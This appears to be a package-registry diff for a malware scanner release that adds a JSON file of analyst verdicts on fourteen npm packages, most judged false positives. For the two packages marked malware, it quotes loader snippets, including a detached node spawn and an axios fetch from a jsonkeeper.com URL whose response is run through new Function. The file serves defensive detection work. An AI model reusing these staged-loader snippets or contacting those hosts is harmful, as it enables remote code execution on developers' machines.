muaddib-scanner 2.11.113 → 2.11.114
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
|
@@ -0,0 +1,56 @@
|
|
|
1
|
+
{
|
|
2
|
+
"meta": {
|
|
3
|
+
"period": "2026-06-14",
|
|
4
|
+
"method": "blind code read of archive/ tarballs (not MUAD'DIB labels); verdict on sink reached, not signal shape",
|
|
5
|
+
"context": "Chantier FPR Etape A. Top-band suspects (daily 2026-06-14, score 145-150) + mid-band credential_regex_harvest probes (score 20). See FPR-adjudication-2026-06-14.md + tests/samples/sink-coupling-fp/MANIFEST.md",
|
|
6
|
+
"total_reviewed": 14,
|
|
7
|
+
"tally": { "MALWARE": 2, "UNCERTAIN": 1, "FP": 11 },
|
|
8
|
+
"rubric": "TP = signal coupled to a sink (remote-code exec / exfil to an anomalous host: paste-site, dyn-DNS, raw IP). FP = same signal but local build / first-party host / vendored bundle / no dataflow to sink."
|
|
9
|
+
},
|
|
10
|
+
"results": [
|
|
11
|
+
{ "package": "chalk-pro@7.0.4", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
|
|
12
|
+
"reasoning": "Masquerade: published as 'chalk' but is nodemailer source + pino deps + added network deps (axios/request/socket.io-client/sqlite3). postinstall 'node lib/utils/index.js' spawns a DETACHED, fully-silenced node process running lib/utils/smtp-connection/index.js, which fetches & execs remote code. Same jsonkeeper C2 as richtext-editor-ui.",
|
|
13
|
+
"payload_quotes": ["spawn(process.execPath,[smtp-connection/index.js],{detached:true,stdio:['ignore','ignore','ignore']}).unref()", "axios.get(\"https://www.jsonkeeper.com/b/TOAAK\").then(r => new Function(\"require\", r.data.cookie)(require))"],
|
|
14
|
+
"fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
|
|
15
|
+
{ "package": "richtext-editor-ui@1.0.0", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
|
|
16
|
+
"reasoning": "Name/content mismatch. postinstall.js decodes atob(jsonkeeper URL), axios.get, pipes returned code into a detached node via stdin. Pure remote staged loader. Same actor as chalk-pro.",
|
|
17
|
+
"payload_quotes": ["const s1=(await axios.get(atob('...jsonkeeper.com/b/7EBZP'))).data.content", "spawn('node',[],{detached:true,stdio:['pipe','ignore','ignore']}); child.stdin.write(s1)"],
|
|
18
|
+
"fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
|
|
19
|
+
{ "package": "xzcbailz@1.0.3", "day": "2026-06-14", "score": 145, "verdict": "UNCERTAIN", "review_type": "deep",
|
|
20
|
+
"reasoning": "Baileys (WhatsApp) fork. preinstall engine-requirements.js is a benign Node-version check. 'newsletter'/'subscribe' hits are all in STOCK Baileys files (messages-recv, chats, jid-utils) -> lifecycle_newsletter_hijack likely misfired on native Baileys newsletter handling. No remote loader / exfil found. Would need a diff vs upstream Baileys to confirm an injected auto-follow.",
|
|
21
|
+
"payload_quotes": [], "fp_trigger_pattern": "baileys_fork_newsletter_misfire" },
|
|
22
|
+
{ "package": "@kinoshitastudio/noa@0.1.0", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
23
|
+
"reasoning": "Self-hosted LOCAL web terminal (express+ws+node-pty), token-gated, path-traversal guarded. direct_ip_exfil = a hardcoded Tailscale IP in a console.log start banner, NOT an egress sink. lifecycle_hidden_payload = postinstall node-pty native rebuild.",
|
|
24
|
+
"payload_quotes": ["const tailscaleIP='100.107.218.60'; console.log(`Tailscale -> http://${tailscaleIP}:${PORT}`)"], "fp_trigger_pattern": "local_web_terminal" },
|
|
25
|
+
{ "package": "@lordofdestiny/mynumber@1.5.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
26
|
+
"reasoning": "C++ native addon (binding.gyp, CMakeLists, src/*.cpp, @mapbox/node-pre-gyp). install.js = node-pre-gyp prebuilt-fetch-or-build (LOCAL toolchain). No exfil/credential sink.",
|
|
27
|
+
"payload_quotes": [], "fp_trigger_pattern": "native_addon_node_pre_gyp" },
|
|
28
|
+
{ "package": "mandrel@1.64.0", "day": "2026-06-14", "score": 145, "verdict": "FP", "review_type": "deep",
|
|
29
|
+
"reasoning": "Code-quality / AI-agents CLI. 44x dynamic_import = lib/cli command lazy-loading. postinstall best-effort 'mandrel sync' (documented no-net/no-shell, exits 0). No sink.",
|
|
30
|
+
"payload_quotes": [], "fp_trigger_pattern": "cli_dynamic_import_loader" },
|
|
31
|
+
{ "package": "vibes-prompt-runner@0.1.0-beta.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
32
|
+
"reasoning": "WebdriverIO + VS Code extension test harness. postinstall patch-wdio.js patches its OWN node_modules (wdio-vscode-service, VS Code main.js) + local codesign. No remote fetch / exfil.",
|
|
33
|
+
"payload_quotes": [], "fp_trigger_pattern": "wdio_vscode_test_harness" },
|
|
34
|
+
{ "package": "xp-gate@0.5.1", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
35
|
+
"reasoning": "Code-quality gate CLI with git hooks (husky-style) + multi-language adapters + AI skills. 0 runtime deps. git_hooks_injection = installs pre-commit/pre-push hooks. prepack build script. No network/credential/exfil. (scoped @boyingliu01/xp-gate is the same tool.)",
|
|
36
|
+
"payload_quotes": [], "fp_trigger_pattern": "git_hook_dev_tool" },
|
|
37
|
+
{ "package": "opticore-asymmetric-cryption@1.0.0", "day": "2026-06-14", "score": 147, "verdict": "FP", "review_type": "deep",
|
|
38
|
+
"reasoning": "RSA crypto helper from a coherent vendor family (opticore-*, author guyzoum77). postinstall.mjs = cosmetic cfonts/chalk banner + 'run npx opticore-gen-keys' hint, with isDev/isCI guard. typosquat_lifecycle/dependency_typosquat_require = boundary-squat compound misfire on the family deps. No sink.",
|
|
39
|
+
"payload_quotes": ["cfonts.say('OpticoreJS',...); console.log('Run: npx opticore-gen-keys')"], "fp_trigger_pattern": "typosquat_compound_misfire" },
|
|
40
|
+
{ "package": "react-markup@0.0.0-experimental", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
41
|
+
"reasoning": "Official React package (experimental channel), 0 deps, 0 scripts. cjs/*.development.js bundles. credential_regex_harvest + dangerous_call_eval + intent_credential_exfil all fire on the minified-ish React bundle. No sink.",
|
|
42
|
+
"payload_quotes": [], "fp_trigger_pattern": "vendor_bundle_minified" },
|
|
43
|
+
{ "package": "@floless/app@0.18.1", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
44
|
+
"reasoning": "Local AI-app launcher (SEA build, skills, web UI). 0 deps, NO install hook. detached/silent_stealth/lifecycle_dangerous_exec = launching its OWN local server (launch.mjs). No remote exfil.",
|
|
45
|
+
"payload_quotes": [], "fp_trigger_pattern": "local_app_launcher" },
|
|
46
|
+
{ "package": "@remotion/whisper-web@4.0.477", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
47
|
+
"reasoning": "Whisper speech-to-text WASM for Remotion. remote_code_load = downloads the GGML model from huggingface.co/ggerganov/whisper.cpp (first-party ML host). No exfil.",
|
|
48
|
+
"payload_quotes": ["https://huggingface.co/ggerganov/whisper.cpp/resolve/main/ggml-"], "fp_trigger_pattern": "ml_model_download" },
|
|
49
|
+
{ "package": "@vxrn/react-native-prebuilt@1.17.11", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
50
|
+
"reasoning": "Vendored React + React-Native renderers (ReactFabric-dev.js etc.) for the vxrn/One bundler. staged_payload/proxy_data_intercept/builtin_override_exfil fire on the vendored RN reconciler. 0 fetch/ws, no install hook.",
|
|
51
|
+
"payload_quotes": [], "fp_trigger_pattern": "vendored_framework_internals" },
|
|
52
|
+
{ "package": "@kilocode/cli-darwin-x64@7.3.44", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
53
|
+
"reasoning": "AI coding CLI (174MB: prebuilt darwin binary + Shiki language-grammar web console assets). websocket_c2/remote_code_load/staged_binary_payload fire on the prebuilt binary + the LLM-provider catalog (opencode.ai, zenmux.ai, perplexity, cloudflare...). Not C2.",
|
|
54
|
+
"payload_quotes": [], "fp_trigger_pattern": "ai_cli_binary_catalog" }
|
|
55
|
+
]
|
|
56
|
+
}
|